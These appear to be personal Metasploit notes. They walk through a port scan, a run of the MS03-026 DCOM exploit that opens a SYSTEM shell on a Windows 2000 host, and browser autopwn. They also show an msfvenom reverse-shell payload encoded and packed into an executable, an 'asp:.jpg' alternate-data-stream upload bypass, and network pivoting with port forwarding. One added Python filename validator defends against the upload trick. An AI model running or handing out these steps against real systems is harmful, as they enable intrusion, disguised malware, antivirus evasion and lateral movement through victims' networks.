Use command line
msfupdate
msfconsole
Scan (I like nmap better)
msf > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > show options
msf auxiliary(tcp) > set PORTS 1-200
PORTS => 1-200
msf auxiliary(tcp) > set RHOSTS 192.168.8.1-20
RHOSTS => 192.168.8.1-20
msf auxiliary(tcp) > run
[*] 192.168.8.15:9 - TCP OPEN
[*] 192.168.8.15:7 - TCP OPEN
[*] 192.168.8.15:17 - TCP OPEN
[*] 192.168.8.15:13 - TCP OPEN
[*] 192.168.8.15:19 - TCP OPEN
[*] 192.168.8.15:25 - TCP OPEN
[*] 192.168.8.15:21 - TCP OPEN
[*] 192.168.8.15:42 - TCP OPEN
[*] 192.168.8.15:53 - TCP OPEN
[*] 192.168.8.15:80 - TCP OPEN
[*] 192.168.8.15:139 - TCP OPEN
[*] 192.168.8.15:135 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) > back
Search
msf > search dcom
Matching Modules
================

   Name                                       Disclosure Date  Rank   Description
   ----                                       ---------------  ----   -----------
   exploit/windows/dcerpc/ms03_026_dcom       2003-07-16       great  Microsoft RPC DCOM Interface Overflow
   exploit/windows/driver/broadcom_wifi_ssid  2006-11-11       low    Broadcom Wireless Driver Probe Response SSID Overflow
   exploit/windows/smb/ms04_031_netdde        2004-10-12       good   Microsoft NetDDE Service Overflow
EXPLOIT
msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > show options
Module options (exploit/windows/dcerpc/ms03_026_dcom):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.8.15     yes       The target address
   RPORT  135              yes       The target port
The payload can be changed:
msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/reverse_tcp

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST     192.168.7.20     yes       The listen address
   LPORT     4444             yes       The listen port

For the run below a bind shell was used instead:
msf exploit(ms03_026_dcom) > set PAYLOAD windows/shell/bind_tcp
msf exploit(ms03_026_dcom) > exploit
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.8.15[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.8.15[135] ...
[*] Sending exploit ...
[*] Sending stage (240 bytes) to 192.168.8.15
[*] Command shell session 4 opened (192.168.7.20:33994 -> 192.168.8.15:4444) at 2012-01-14 09:24:46 -0500
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
C:\WINNT\system32>
Meterpreter
meterpreter > sysinfo
Computer : FOOL
OS : Windows 2000 (Build 2195).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
meterpreter >
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getpid
Current pid: 432
Browser based attacks
msf > use auxiliary/server/browser_autopwn
set options
Msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST and LPORT
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.73.128 LPORT=4444 \
    -e x86/shikata_ga_nai -i 25 -x /root/Desktop/atack.exe -f exe > /root/Desktop/atack.exe
cat bad.jpg bad.asp > 'bad.asp:.jpg'
sessions -l
sessions -i 1
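The `bad.asp:.jpg` trick above only works against an upload handler that validates the trailing extension of the submitted name; on NTFS the text after the colon names an alternate data stream, so the file that lands on disk is `bad.asp`. A server-side filename check that closes that gap, written here as an added Python example (it is not part of these notes; the allowed-extension set, the executable-extension list and the `reject_reason` function are my own assumptions):

```python
# Added example: server-side validation of an uploaded filename. The
# allow-list, the executable-extension list and the function names are
# assumptions for this demo, not part of any product.
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
# Extensions a web server may hand to a script engine; refused anywhere in
# the name, so "bad.asp.jpg" is rejected as well as "bad.asp".
EXEC_EXT = {"asp", "aspx", "asa", "cer", "php", "jsp", "cgi", "exe", "dll"}
RESERVED = {"CON", "PRN", "AUX", "NUL"} \
    | {f"COM{i}" for i in range(1, 10)} | {f"LPT{i}" for i in range(1, 10)}


def reject_reason(name: str):
    """Return None if the submitted filename is acceptable, else a reason."""
    if not name or len(name) > 255:
        return "empty or too long"
    if any(ord(c) < 32 for c in name):
        return "control character"
    if "/" in name or "\\" in name:
        return "path separator"
    # "bad.asp:.jpg" -> NTFS creates bad.asp with a stream named ".jpg"
    if ":" in name:
        return "NTFS alternate data stream syntax"
    # Windows strips trailing dots and spaces, so "x.jpg." lands as "x.jpg"
    if name != name.rstrip(". "):
        return "trailing dot or space"
    parts = name.split(".")
    if len(parts) < 2 or not parts[0]:
        return "missing base name or extension"
    if parts[0].upper() in RESERVED:
        return "reserved device name"
    if parts[-1].lower() not in ALLOWED_EXT:
        return "extension not allowed"
    if any(p.lower() in EXEC_EXT for p in parts[:-1]):
        return "embedded executable extension"
    return None


def safe_upload_name(name: str) -> str:
    """Raise ValueError on an unacceptable name; return it lower-cased."""
    reason = reject_reason(name)
    if reason:
        raise ValueError(f"rejected {name!r}: {reason}")
    return name.lower()
```

Storing the upload under a server-generated name rather than the submitted one removes the dependence on this check altogether.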
Pivot
Gain access to the first box.
If it has multiple interfaces:
ipconfig
Use ARP to find the hosts on the other subnet:
run arp_scanner -r <subnet>   (e.g. 192.168.0.1/24)
Add a route through the session:
route add <subnet> 255.255.255.0 <session ID>
route print
Port scanner
use auxiliary/scanner/portscan/tcp (cannot do a SYN scan)
set RHOSTS
set PORTS 1-200
run
Bind is the best payload for this attack.
Port Forward
The local listener is on the attacker's box:
portfwd add -l 25000 -p 80 -r <IP of target>
Now I can connect to the target's port 80 through localhost:25000.
WSCSVC
c:\windows\system32\svchost.exe -k netsvcs
run switchwsc